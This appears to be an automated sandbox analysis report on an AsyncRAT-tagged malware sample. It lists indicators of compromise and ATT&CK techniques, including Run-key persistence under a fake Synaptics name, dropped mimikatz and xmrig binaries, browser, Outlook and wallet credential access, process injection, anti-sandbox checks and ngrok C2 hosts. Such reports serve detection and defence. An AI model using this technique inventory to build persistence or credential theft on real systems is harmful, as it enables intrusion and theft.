asyncrat | 672ad2d52af206cc63cebe2c801181d3b406aae5891cc57bdaafd5eea3d61fe6

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cbot.exe	cbot.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cbot.exe	cbot.exe

Executes dropped EXE 43 IoCs

pid	Process
1988	New Text Document mod.exe
4628	._cache_New Text Document mod.exe
2888	Synaptics.exe
4104	._cache_Synaptics.exe
1824	New Text Document mod.exe
3956	._cache_New Text Document mod.exe
3352	voidware_loader.exe
1096	DirectX111.exe
3340	build.exe
4656	gem1.exe
3424	gem1.exe
2528	gem1.exe
4676	New Text Document mod.exe
764	._cache_New Text Document mod.exe
2860	voidware_loader.exe
5128	gem2.exe
6104	Lightshot.exe
6828	New Text Document mod.exe
6988	._cache_New Text Document mod.exe
5420	New Text Document mod.exe
1600	._cache_New Text Document mod.exe
5160	cbot.exe
6872	Client.exe
1140	New Text Document mod.exe
1484	._cache_New Text Document mod.exe
6408	New Text Document mod.exe
3012	._cache_New Text Document mod.exe
5128	svhost.exe
5296	mimikatz.exe
6296	123.exe
6800	xmrig.exe
5636	chrtrome22.exe
6600	Fixer.exe
5660	Client-built.exe
5076	New Text Document mod.exe
4840	._cache_New Text Document mod.exe
1920	New Text Document mod.exe
6632	._cache_New Text Document mod.exe
6552	Steanings.exe
6712	New Text Document mod.exe
6480	._cache_New Text Document mod.exe
6188	New Text Document mod.exe
5256	._cache_New Text Document mod.exe

Loads dropped DLL 25 IoCs

pid	Process
2888	Synaptics.exe
2888	Synaptics.exe
1824	New Text Document mod.exe
1824	New Text Document mod.exe
4676	New Text Document mod.exe
4676	New Text Document mod.exe
6828	New Text Document mod.exe
6828	New Text Document mod.exe
5420	New Text Document mod.exe
5420	New Text Document mod.exe
2888	Synaptics.exe
2888	Synaptics.exe
2888	Synaptics.exe
1140	New Text Document mod.exe
1140	New Text Document mod.exe
6408	New Text Document mod.exe
6408	New Text Document mod.exe
5076	New Text Document mod.exe
5076	New Text Document mod.exe
1920	New Text Document mod.exe
1920	New Text Document mod.exe
6712	New Text Document mod.exe
6712	New Text Document mod.exe
6188	New Text Document mod.exe
6188	New Text Document mod.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe
Key opened	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe
Key opened	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe
Key opened	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe
Key opened	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	New Text Document mod.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs

Web Service

T1102

flow	ioc
183	0.tcp.in.ngrok.io
341	raw.githubusercontent.com
57	drive.google.com
174	drive.google.com
335	raw.githubusercontent.com
44	raw.githubusercontent.com
56	drive.google.com
383	drive.google.com
16	raw.githubusercontent.com
18	raw.githubusercontent.com
18	drive.google.com
528	drive.google.com
15	raw.githubusercontent.com
310	0.tcp.in.ngrok.io
373	0.tcp.in.ngrok.io

Looks up external IP address via web service 11 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
27	api.ipify.org
213	ip-api.com
355	api.ipify.org
511	checkip.dyndns.org
517	reallyfreegeoip.org
519	reallyfreegeoip.org
557	api.ipify.org
38	api.ipify.org
304	ip-api.com
356	api.ipify.org
396	api.ipify.org

Power Settings 1 TTPs 24 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2320	powercfg.exe
4032	powercfg.exe
5616	powercfg.exe
5624	powercfg.exe
8000	powercfg.exe
212	powercfg.exe
4680	powercfg.exe
5440	powercfg.exe
6604	powercfg.exe
7172	powercfg.exe
2552	powercfg.exe
7044	powercfg.exe
5704	cmd.exe
7668	powercfg.exe
2436	powercfg.exe
3408	powercfg.exe
8248	powercfg.exe
5664	powercfg.exe
7036	powercfg.exe
7052	powercfg.exe
7656	powercfg.exe
7080	powercfg.exe
7400	powercfg.exe
7060	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	gem2.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Lightshot.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 4656 set thread context of 3424	4656	gem1.exe	104
PID 4656 set thread context of 2528	4656	gem1.exe	105
PID 5128 set thread context of 5660	5128	gem2.exe	164
PID 6104 set thread context of 7068	6104	Lightshot.exe	196
PID 6104 set thread context of 7096	6104	Lightshot.exe	197
PID 6104 set thread context of 5452	6104	Lightshot.exe	201

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/0x000300000000069f-1904.dat	upx
behavioral4/memory/5160-1907-0x00007FF7165B0000-0x00007FF7165C7000-memory.dmp	upx
behavioral4/memory/5160-1942-0x00007FF7165B0000-0x00007FF7165C7000-memory.dmp	upx

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	setup.exe

Launches sc.exe 26 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5612	sc.exe
5340	sc.exe
6820	sc.exe
6916	sc.exe
6996	sc.exe
5472	sc.exe
5564	sc.exe
6748	sc.exe
6876	sc.exe
9156	sc.exe
712	sc.exe
7924	sc.exe
5296	sc.exe
5736	sc.exe
6080	sc.exe
7008	sc.exe
5764	sc.exe
8164	sc.exe
3952	sc.exe
8488	sc.exe
5524	sc.exe
1484	sc.exe
7244	sc.exe
8556	sc.exe
3748	sc.exe
8440	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral4/files/0x000600000000f4ac-1998.dat	embeds_openssl

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
4212	4656	WerFault.exe	102
8076	4080	WerFault.exe	301
1992	7416	WerFault.exe	332

System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Client-built.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gem1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gem1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gem1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Steanings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	123.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Fixer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5344	cmd.exe
8160	PING.EXE

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral4/files/0x001900000002ad7d-4772.dat	nsis_installer_1
behavioral4/files/0x001900000002ad7d-4772.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE

Enumerates system info in registry 2 TTPs 7 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Kills process with taskkill 2 IoCs

evasion

pid	Process
3488	taskkill.exe
8528	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	lsass.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133812639527220755"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	lsass.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	lsass.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	lsass.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 44003100000000002d5acb8d10006100340009000400efbe2d5ab18d2d5acc8d2e000000ed5a020000000600000000000000000000000000000071793f006100000010000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 = f3021f007902d5dfa3236b02040000000000670200003153505305d5cdd59c2e1b10939708002b2cf9aeb301000012000000004100750074006f004c006900730074000000420000001e000000700072006f0070003400320039003400390036003700320039003500000000006a010000aea54e38e1ad8a4e8a9b7bea78fff1e90600008000000000010000000200008001000000010000000200000020000000000000007a0014001f44471a0359723fa74489c55595fe6b30ee200000001a00eebbfe23000010003accbfb42cdb4c42b0297fe99a87c641000044003100000000002d5ad58d10006100340009000400efbe2d5ab18d2d5ad58d2e000000ed5a0200000006000000000000000000000000000000e65924016100000010000000000000000000000000000000000000000000000001000000010000800100000004006900740065006d00000000000000000000000000000000000000000000000000000000000000000000000000000000001e1ade7f318ba54993b86be14cfa4943ffffffffffffffffffffffff00000000010000001300530065006100720063006800200052006500730075006c0074007300200069006e00200061000000000000000000000000000000000000000000000000000000000000003900000024000000004100750074006f006c0069007300740043006100630068006500540069006d0065000000140000006058fd1a1e0000005f00000022000000004100750074006f006c00690073007400430061006300680065004b006500790000001f00000015000000530065006100720063006800200052006500730075006c0074007300200069006e002000610030000000000000000000000000000000741a595e96dfd3488d671733bcee28ba671b730433d90a4590e64acd2e9408fe2a0000001300efbe00000020000000000000000000000000000000000000000000000000010000009f022a0000001900efbe1e1ade7f318ba54993b86be14cfa49436f73bebdf5342948abe8b550e65146c49f020000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\Sort = 0000000000000000000000000000000003000000901c6949177e1a10a91c08002b2ecda903000000ffffffff30f125b7ef471a10a5f102608c9eebac0e000000ffffffff30f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	New Text Document mod.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff	chrome.exe
